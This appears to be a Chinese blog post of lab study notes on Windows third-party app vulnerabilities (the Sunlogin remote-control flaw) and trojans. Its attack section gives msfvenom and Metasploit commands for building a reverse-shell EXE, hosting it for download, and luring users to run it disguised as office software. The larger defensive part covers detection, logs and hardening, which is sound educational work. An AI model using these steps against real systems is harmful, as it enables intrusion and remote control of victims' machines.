news 2026/8/23 13:01:48

Windows 第三方应用漏洞与木马攻防实操核心笔记

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Windows 第三方应用漏洞与木马攻防实操核心笔记

文中所有操作皆是在靶场中进行操作的

Windows 第三方应用漏洞与木马攻防实操核心笔记

核心框架

本资料围绕Windows 第三方应用程序漏洞展开,从攻击视角讲解木马制作与植入,从防御视角梳理木马排查、日志分析、系统防护方法,最终总结攻防核心知识与多维度防御措施,侧重实操命令与步骤。

一、第三方应用程序漏洞

1. 核心概念

第三方漏洞是非 Windows 系统基础框架外的应用软件 / 组件 / 服务(办公软件、远程控制工具、浏览器插件等)的安全缺陷,是系统打补丁后攻击者的主要入侵入口。

2. 典型案例:向日葵远程控制软件漏洞

受影响版本
  • 向日葵个人版 for Windows ≤ 11.0.0.33
  • 向日葵简约版 ≤ V1.0.1.43315(2021 年 12 月版本)
攻击流程(实操关键)
  1. 端口扫描:向日葵运行时开放40000-65535随机端口,扫描命令:
    nmap -p 40000-65535 目标机IP # Kali/Windows CMD均可执行
    扫描结果中open状态的端口即为向日葵服务端口。
  2. 漏洞利用
    • 前置条件:攻击机安装JDK 8环境
    • 启动工具命令:java -jar Sunlogin漏洞利用工具.jar
    • 操作步骤:输入目标机 IP + 开放端口 → 执行利用 → 获取目标机 CMD / 文件管理控制权
防御手段
  • 核心:将向日葵更新至最新版本(官方已修复漏洞)
  • 辅助:防火墙限制向日葵端口访问,仅允许授权 IP 连接

二、攻击视角:木马制作与植入(Kali + Metasploit)

核心目标:制作反向连接木马,诱导目标机执行后实现远程控制,全程需保证攻击机与目标机网络互通。

1. 制作 Windows 木马程序

  1. 启动 Metasploit:msfconsole
  2. 生成 EXE 格式反向连接木马:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=自定义端口 -f exe > shell.exe
    • 参数说明:-p指定攻击载荷;LHOST攻击机本机 IP;LPORT自定义监听端口(如 9999)

2. 搭建文件服务器(供目标机下载木马)

  1. 移动木马至 Apache 根目录:mv shell.exe /var/www/html
  2. 启动 Apache 服务:service apache2 start
  3. 验证:浏览器访问http://攻击机IP/shell.exe,可下载即搭建成功

3. 攻击机开启监听(等待目标机连接)

msfconsole use exploit/multi/handler # 加载监听模块 set payload windows/meterpreter/reverse_tcp # 与木马云载一致 set lhost 0.0.0.0 # 监听所有网卡 set lport 自定义端口 # 与木马LPORT一致 run # 启动监听

4. 木马植入与控制

  1. 植入方式:社会工程学(邮件 / 聊天发下载链接)、内网渗透(复制到共享文件夹)、漏洞利用(如 MS17-010)
  2. 启动木马:诱导目标机用户双击执行shell.exe(可伪装为办公软件安装包)
  3. 控制目标机:目标机执行后,攻击机显示Meterpreter session 1 opened即连接成功,可执行ps(查进程)、screenshot(截屏)、shell(获取 CMD)等操作。

三、防御视角:木马排查手段

1. 系统自带工具排查(核心,无额外安装)

排查类型实操工具 / 命令重点排查内容
进程排查1. 任务管理器(Ctrl+Shift+Esc)2.msinfo32(Win+R 输入,软件环境→正在运行任务)陌生名称、CPU / 内存占用异常、路径异常(如C:\Windows\Temp)的进程,查看进程完整路径 / 启动命令
网络连接排查1.netstat -ano(查连接 / 端口 / PID)2. `tasklistfindstr "PID 号"`(关联进程)ESTABLISHED(陌生 IP 连接)、LISTENING(异常端口监听)状态,通过 PID 定位可疑进程
服务排查1.services.msc(Win+R 输入,图形化)2.net start(命令行,查运行中服务)运行中 / 自动启动、无厂商信息 / 名称陌生的服务

2. 自动启动项与计划任务排查(木马自启 / 重生关键)

(1)启动项排查
  • 任务管理器:启动选项卡,禁用陌生启动项
  • 启动文件夹:
    • 用户级:C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    • 系统级:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
  • 注册表路径:
    • 用户级:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • 系统级:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
(2)计划任务排查
  • 图形化:taskschd.msc(Win+R 输入),查未知来源、触发条件为开机 / 定时的可疑任务
  • 命令行:schtasks /query(查看所有计划任务)

3. 第三方工具排查(针对性场景,精准检测)

工具名称适用系统核心功能应用场景
PCHunterWindows 7深度检测隐藏进程 / 驱动 / 端口,强制结束抗杀进程应急响应、勒索病毒定位、删除顽固后门
火绒剑Windows 10/11分析进程 / 网络 / 启动项(集成于火绒)系统维护、恶意程序溯源
UserAssistView全 Windows 系统解析注册表,查看程序执行记录(时间 / 次数)取证分析、判断攻击者操作痕迹

四、Windows 系统日志分析(应急响应取证关键)

1. 日志类型与查看方式

日志类型记录内容查看路径
应用程序日志软件运行状态(安装失败、崩溃等)计算机管理→事件查看器→Windows 日志→应用程序
安全日志账户登录 / 注销、权限变更、文件访问等安全操作计算机管理→事件查看器→Windows 日志→安全
系统日志系统服务启动 / 停止、驱动安装、系统错误等计算机管理→事件查看器→Windows 日志→系统

2. 应急响应常用关键事件 ID

事件 ID事件描述核心用途
4625账户登录失败检测暴力破解攻击
4624账户登录成功排查陌生 IP / 管理员账户异常登录
4720创建用户账户检测是否被植入隐藏用户
4732将用户添加到管理员组检测攻击者权限提升操作
4688新进程创建排查木马等可疑进程启动

五、Windows Defender 防护功能

1. 病毒与威胁防护

  • 实时保护:云 AI 引擎 + 本地病毒库,实时扫描文件 / 进程,拦截恶意软件
  • 离线扫描:系统启动前深度扫描,清除引导区病毒等顽固病毒
  • 行为监控:检测异常进程行为(如修改注册表、批量加密文件)

2. 防火墙与网络保护

  • 双向防火墙:默认阻止未授权入站连接,可自定义出站规则(禁止陌生程序联网)
  • 网络隔离:自动识别专用 / 公用网络,公用网络下启用严格防护策略

六、学习总结与核心防御体系

1. 核心知识梳理

  1. 版本与风险:Win7/Server 2008 等老旧系统漏洞多、防御弱,Win10/11 防护强化,攻防需针对性操作
  2. 基础与利用:理解系统服务(SMB/RDP)、用户权限、注册表是掌握漏洞原理的关键
  3. 应急响应流程:发现异常(进程 / 端口 / 日志)→定位威胁(关联 PID / 路径 / 事件 ID)→清除威胁(结束进程 / 删文件 / 禁用启动项)→加固防护(打补丁 / 配置防火墙)

2. 多层面防御措施汇总(全覆盖,易落地)

防护层面核心实操措施
网络层1. 修改默认端口(如 RDP 3389 改为非默认)2. 配置 IP 白名单,仅允许授权设备访问3. 防火墙拦截危险端口(139/445/3389 等)
账户层1. 设置≥12 位强密码(大小写 + 数字 + 特殊符号)2. 启用账户锁定策略(如 5 次错误锁定 30 分钟)3. 禁用来宾账户,定期排查隐藏 / 影子用户
系统层1. 定期通过 Windows Update 安装安全补丁2. 禁用危险协议(SMBv1)和不必要的系统服务3. 启用审核策略,记录登录 / 权限变更等关键安全事件
终端层1. 启用并及时更新 Windows Defender2. 安装第三方杀毒软件(火绒、卡巴斯基等)3. 安全意识培训:不打开陌生附件、不点击可疑链接

这是小白通过写笔记想向大神们学习,里面有错误或者不足的地方,还请各位大神指出来,小生在这先感谢各位大神的观看和指导

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/14 16:44:31

80%效率提升:douyin-downloader一站式抖音视频管理解决方案

80%效率提升:douyin-downloader一站式抖音视频管理解决方案 【免费下载链接】douyin-downloader 项目地址: https://gitcode.com/GitHub_Trending/do/douyin-downloader 在数字内容爆炸的时代,抖音作为国内领先的短视频平台,每天产生…

作者头像 李华
网站建设 2026/7/14 16:44:22

计算机网络面试题

文章目录一、 HTTP 请求方法深度对比1. GET vs POST2. POST vs PUT二、 HTTP 协议版本三、HTTP 与 HTTPS 之间区别四、当在浏览器中输入 Google.com 并且按下回车之后发生了什么?五、HTTP 缓存策略1. 强缓存 (不发请求)2. 协商缓存 (发请求询问)六、HTTP 报文结构1.…

作者头像 李华
网站建设 2026/7/14 16:44:31

飞书群机器人消息通知进阶:Python实现动态数据绑定与消息卡片模板化

飞书消息卡片的艺术:用Python构建动态、可维护的自动化通知系统 你是否厌倦了每次发送团队通知都要手动复制粘贴、修改数据,或者面对那些一旦需求变更就得重写大半的通知代码?在快节奏的团队协作中,一个灵活、强大且易于维护的消息…

作者头像 李华
网站建设 2026/7/14 16:44:34

降AI率工具哪个效果好?2026年10个主流降AI工具综合测评对比!

降AI率工具哪个效果好?2026年10个主流降AI工具综合测评对比! 2026年是论文AIGC查重的严格规范年,国内绝大多数高校都明确要求毕业论文的AI率查重不超过30%,部分重点院校甚至将阈值设为15%,降AI率的需求在毕业季彻底爆发…

作者头像 李华
网站建设 2026/7/14 16:44:32

2026年10款降AI率工具实测对比:论文AI率过高的救命指南

2026年10款降AI率工具实测对比:论文AI率过高的救命指南 一、SpeedAI是什么? SpeedAI是一款专注于多语言降AI降重的工具,业内首个“双引擎”AI痕迹擦除器——同时针对「AI生成检测(AIGC)」与「传统重复率」两项指标做深…

作者头像 李华
网站建设 2026/7/14 16:44:33

大数据领域Eureka的配置中心集成实践

大数据领域Eureka的配置中心集成实践:从手忙脚乱到从容不迫的配置管理进化史 关键词:Eureka、配置中心、微服务、大数据、动态配置、服务发现、分布式系统 摘要:在大数据领域的微服务架构中,服务数量多、配置参数复杂、动态调整需求频繁是常见挑战。本文将以"电商大促…

作者头像 李华